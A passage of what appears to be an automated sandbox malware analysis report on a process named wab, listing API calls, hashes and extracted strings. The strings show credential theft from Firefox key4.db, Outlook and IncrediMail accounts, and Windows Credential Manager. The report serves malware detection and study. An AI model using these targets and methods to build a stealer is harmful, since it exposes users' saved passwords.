                                                                                                                                                • _mbscpy.MSVCRT ref: 00409512
                                                                                                                                                • memset.MSVCRT ref: 0040952E
                                                                                                                                                • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409542
                                                                                                                                                  • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                • API String ID: 1035899707-3647959541
                                                                                                                                                • Opcode ID: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                • Instruction ID: 9dc8dfcbefe26b31ead3ecdd6c1d49ac828ce4ba7b4c08f8d1d1c72bb5e2ee9a
                                                                                                                                                • Opcode Fuzzy Hash: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                • Instruction Fuzzy Hash: A6112B7190025476F73127169C06FDB3E5CDF86B96F00407BBB08B61D3C6B94D40866D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy
                                                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                • API String ID: 714388716-318151290
                                                                                                                                                • Opcode ID: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                • Instruction ID: 9896847eb90bf5c4294a3c9dccddd80cbc36a64f1d49de08ffe9e6d9729d10b2
                                                                                                                                                • Opcode Fuzzy Hash: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                • Instruction Fuzzy Hash: 5CF054B1BA870D60343C0528088EAF715009463B453764627F222E05DECEEDBCD26C0F
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040C7C9
                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 0040C7D7
                                                                                                                                                • SelectObject.GDI32(?,?), ref: 0040C7EC
                                                                                                                                                • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C821
                                                                                                                                                • SelectObject.GDI32(00000014,?), ref: 0040C82D
                                                                                                                                                  • Part of subcall function 0040C586: GetCursorPos.USER32(?), ref: 0040C593
                                                                                                                                                  • Part of subcall function 0040C586: GetSubMenu.USER32(?,00000000), ref: 0040C5A1
                                                                                                                                                  • Part of subcall function 0040C586: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C5CE
                                                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040C84E
                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040C855
                                                                                                                                                • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040C877
                                                                                                                                                • SetFocus.USER32(?), ref: 0040C8B2
                                                                                                                                                • SetFocus.USER32(?), ref: 0040C92B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1416211542-0
                                                                                                                                                • Opcode ID: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                • Instruction ID: 09ccc7060a79f4adaf8e2edad657e89b5ff3622033c15eab8e38028839dfd0e9
                                                                                                                                                • Opcode Fuzzy Hash: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                • Instruction Fuzzy Hash: 4E518276200605EFCB15AF64CCC5AAA77A5FB08302F004636F616B72A1CB39A951DB9D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                • API String ID: 2360744853-2229823034
                                                                                                                                                • Opcode ID: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                • Instruction ID: 5d143ff0da15214bab7bb06cf5d8f907292877c2fd7590e182fa264530f008e8
                                                                                                                                                • Opcode Fuzzy Hash: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                • Instruction Fuzzy Hash: 934185726053059FE724DEA5C881F9673E8EF04304F10497BF64AE3281DB78F9588B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                • memset.MSVCRT ref: 00402C8F
                                                                                                                                                  • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402D91
                                                                                                                                                  • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                • memset.MSVCRT ref: 00402CE9
                                                                                                                                                • sprintf.MSVCRT ref: 00402D02
                                                                                                                                                • sprintf.MSVCRT ref: 00402D40
                                                                                                                                                  • Part of subcall function 00402BC3: memset.MSVCRT ref: 00402BE3
                                                                                                                                                  • Part of subcall function 00402BC3: RegCloseKey.ADVAPI32 ref: 00402C47
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                • API String ID: 1831126014-3814494228
                                                                                                                                                • Opcode ID: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                • Instruction ID: 1b5601e0499ef747dd56af052f35eddfd4da5329eef37c5f4f36e35d9cf9c12c
                                                                                                                                                • Opcode Fuzzy Hash: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                • Instruction Fuzzy Hash: 0831507290011CBAEF11EA91CC46FEF777CAF04305F0404BABA04B2192E7B59F948B64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • strchr.MSVCRT ref: 0040FA5C
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                  • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075DD
                                                                                                                                                  • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075E5
                                                                                                                                                  • Part of subcall function 004075CB: _memicmp.MSVCRT ref: 00407603
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040FABA
                                                                                                                                                • _mbscat.MSVCRT ref: 0040FAC5
                                                                                                                                                • memset.MSVCRT ref: 0040FAA1
                                                                                                                                                  • Part of subcall function 00406EF9: GetWindowsDirectoryA.KERNEL32(004517B0,00000104,?,0040FAFA,00000000,?,00000000,00000104,00000104), ref: 00406F0E
                                                                                                                                                  • Part of subcall function 00406EF9: _mbscpy.MSVCRT ref: 00406F1E
                                                                                                                                                • memset.MSVCRT ref: 0040FAE9
                                                                                                                                                • memcpy.MSVCRT ref: 0040FB04
                                                                                                                                                • _mbscat.MSVCRT ref: 0040FB0F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                • String ID: \systemroot
                                                                                                                                                • API String ID: 912701516-1821301763
                                                                                                                                                • Opcode ID: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
                                                                                                                                                • Instruction ID: 2dd3a797b17f22995e4c1cf65abf5f7fbb47152c003677c6e5f404f17f2ef451
                                                                                                                                                • Opcode Fuzzy Hash: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
                                                                                                                                                • Instruction Fuzzy Hash: 92210A7550C20469F734E2618C82FEB76EC9B55708F10007FF289E14C1EEBCA9884A6A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • C@, xrefs: 00406625
                                                                                                                                                • SELECT a11,a102 FROM nssPrivate, xrefs: 0040677A
                                                                                                                                                • key4.db, xrefs: 00406632
                                                                                                                                                • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 0040668D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memcmpmemsetstrlen
                                                                                                                                                • String ID: C@$SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                • API String ID: 2950547843-1835927508
                                                                                                                                                • Opcode ID: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                                                                                                                                • Instruction ID: 4af0f314ee18ccde9e1bafe1ac3c0a9422d02a762a4adf5b984e4b61dd213191
                                                                                                                                                • Opcode Fuzzy Hash: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                                                                                                                                • Instruction Fuzzy Hash: A961CA72A00218AFDB10EF75DC81BAE73A8AF04318F12457BF915E7281D678EE548799
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                • memset.MSVCRT ref: 00403010
                                                                                                                                                  • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                • memset.MSVCRT ref: 0040305D
                                                                                                                                                • sprintf.MSVCRT ref: 00403075
                                                                                                                                                • memset.MSVCRT ref: 004030A6
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004030EE
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00403117
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                • API String ID: 3672803090-3168940695
                                                                                                                                                • Opcode ID: 7c98ea0b3754888334cffa6cf5d7d188fa79ef3fb5e75e3e96ead78b92b55a2f
                                                                                                                                                • Instruction ID: 39077b7eb5a2e68ecd5ff501a3ad8ea0a91829c9588d8d8ee698511e4ba158b1
                                                                                                                                                • Opcode Fuzzy Hash: 7c98ea0b3754888334cffa6cf5d7d188fa79ef3fb5e75e3e96ead78b92b55a2f
                                                                                                                                                • Instruction Fuzzy Hash: EE3130B580021CFBDB11EB91CC82EEEBB7CAF15305F0041B6BA08A1152E7799F949F95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                • String ID: 0$6
                                                                                                                                                • API String ID: 3540791495-3849865405
                                                                                                                                                • Opcode ID: 74127b3a6ace4faeac3cb74118fb5aab17d7e36bf865af1988a44d13d40aa2ee
                                                                                                                                                • Instruction ID: 3c8b7fd7a28504c7ca875bf426ab9eeebffe21bfd5384a9a2131e9ee4f2c6c2c
                                                                                                                                                • Opcode Fuzzy Hash: 74127b3a6ace4faeac3cb74118fb5aab17d7e36bf865af1988a44d13d40aa2ee
                                                                                                                                                • Instruction Fuzzy Hash: CB31AD72408384AFD7209F91D940A9BBBE9EF84354F04493FFAC4A2291D778D9548F6A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$strlen
                                                                                                                                                • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                • API String ID: 2619041689-3408036318
                                                                                                                                                • Opcode ID: b4afe22544acede0a86ca576d850925b04083d6883ca1ee22da99f70356edf55
                                                                                                                                                • Instruction ID: 01a3cfc3161f2179d827f175e8c33b529befff994fa447307002f7c0b3a07cf5
                                                                                                                                                • Opcode Fuzzy Hash: b4afe22544acede0a86ca576d850925b04083d6883ca1ee22da99f70356edf55
                                                                                                                                                • Instruction Fuzzy Hash: C7C1F372A04606AFDB14DFA9C841BDEFFB0BF44314F14825EE428E7281D778A994CB95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$strlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4288758904-3916222277
                                                                                                                                                • Opcode ID: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
                                                                                                                                                • Instruction ID: 24b34d1c19d378cbc4a311a34392409bda21909db6314ed607bd163125115c99
                                                                                                                                                • Opcode Fuzzy Hash: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
                                                                                                                                                • Instruction Fuzzy Hash: 6A61873440D782DFDB609F25948006BBBF0FB89315F54593FF5D2A22A1D739984ACB0A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                • wcslen.MSVCRT ref: 004084C2
                                                                                                                                                • _wcsncoll.MSVCRT ref: 00408506
                                                                                                                                                • memset.MSVCRT ref: 0040859A
                                                                                                                                                • memcpy.MSVCRT ref: 004085BE
                                                                                                                                                • wcschr.MSVCRT ref: 00408612
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040863C
                                                                                                                                                  • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$FreeLibrary$LoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                                                                                                                • String ID: J$Microsoft_WinInet
                                                                                                                                                • API String ID: 1371990430-260894208
                                                                                                                                                • Opcode ID: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
                                                                                                                                                • Instruction ID: daadb017bf7cdd7d7f2103bea61dec75ef30dccaf082131e005dcc9144427660
                                                                                                                                                • Opcode Fuzzy Hash: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
                                                                                                                                                • Instruction Fuzzy Hash: D55115B1508346AFD720DF65C980A5BB7E8FF89304F00492EF998D3251EB39E918CB56
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0041028B
                                                                                                                                                • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                • memcpy.MSVCRT ref: 004102D6
                                                                                                                                                Strings
                                                                                                                                                • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410272
                                                                                                                                                • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 00410293
                                                                                                                                                • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041027F
                                                                                                                                                • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410286
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FromStringUuid$memcpy
                                                                                                                                                • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                • API String ID: 2859077140-2022683286
                                                                                                                                                • Opcode ID: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
                                                                                                                                                • Instruction ID: e4eb6b96217285778323d40e2be480743d786dbe6d4556737564963462aa5f63
                                                                                                                                                • Opcode Fuzzy Hash: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
                                                                                                                                                • Instruction Fuzzy Hash: CC116D7290012EABDF11DEA4DC85EEB37ACEB49354F050423FD41E7201E6B8DD848BA6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406A3F
                                                                                                                                                • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406A5D
                                                                                                                                                • strlen.MSVCRT ref: 00406A6A
                                                                                                                                                • _mbscpy.MSVCRT ref: 00406A7A
                                                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406A84
                                                                                                                                                • _mbscpy.MSVCRT ref: 00406A94
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                                                • API String ID: 2881943006-572158859
                                                                                                                                                • Opcode ID: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                                                                                                                                • Instruction ID: d85fce99d4424776e4d89386e5c8d6134dfcbe96067fcf7c7fc9c3f577b26335
                                                                                                                                                • Opcode Fuzzy Hash: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                                                                                                                                • Instruction Fuzzy Hash: 0801F7316001147FEB147B51EC46F9F7E28EB06791F21407AFA06F0091DA795E209AAC
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                                                • Opcode ID: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
                                                                                                                                                • Instruction ID: 36f372293bcd99ea712e996d8bb82ea6b99e6deebf99936071b003413e9982ca
                                                                                                                                                • Opcode Fuzzy Hash: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
                                                                                                                                                • Instruction Fuzzy Hash: 860149797516103BEB115BB19C49F7FBAACDB8674AF010035F602F2182DEBCC9018A5D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                • _mbscpy.MSVCRT ref: 004093F7
                                                                                                                                                • _mbscpy.MSVCRT ref: 00409407
                                                                                                                                                • GetPrivateProfileIntA.KERNEL32(00451308,rtl,00000000,00451200), ref: 00409418
                                                                                                                                                  • Part of subcall function 00408FE9: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,00451358,?,00451200), ref: 00409004
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                • API String ID: 888011440-2039793938
                                                                                                                                                • Opcode ID: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
                                                                                                                                                • Instruction ID: 0b3e14b162d046b550c41b249f06feb679facb3af2f7b05e7ff0b413a15a09bb
                                                                                                                                                • Opcode Fuzzy Hash: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
                                                                                                                                                • Instruction Fuzzy Hash: C6F09621F8435136FB203B325C03F2E29488BD2F56F1640BFBD08B65D3DAAD8811559E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042DFAC
                                                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042E12C
                                                                                                                                                • database %s is already in use, xrefs: 0042E014
                                                                                                                                                • unable to open database: %s, xrefs: 0042E21C
                                                                                                                                                • database is already attached, xrefs: 0042E0DD
                                                                                                                                                • too many attached databases - max %d, xrefs: 0042DF97
                                                                                                                                                • out of memory, xrefs: 0042E235
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                                                • Opcode ID: 6ddab01290ce87d8ebd2da98a857a844c731627c1ed98d62f1e76250c556fc69
                                                                                                                                                • Instruction ID: c7e7a29d1825d2e945301ab40bb758a3ed070f64a4837571caa387bbb47581b8
                                                                                                                                                • Opcode Fuzzy Hash: 6ddab01290ce87d8ebd2da98a857a844c731627c1ed98d62f1e76250c556fc69
                                                                                                                                                • Instruction Fuzzy Hash: BFA1BC70608311DFD720DF2AE441A6BBBE4BF88318F54492FF48987252D778E945CB9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004099C0
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004099DC
                                                                                                                                                • memcpy.MSVCRT ref: 00409A04
                                                                                                                                                • memcpy.MSVCRT ref: 00409A21
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409AAA
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409AB4
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409AEC
                                                                                                                                                  • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
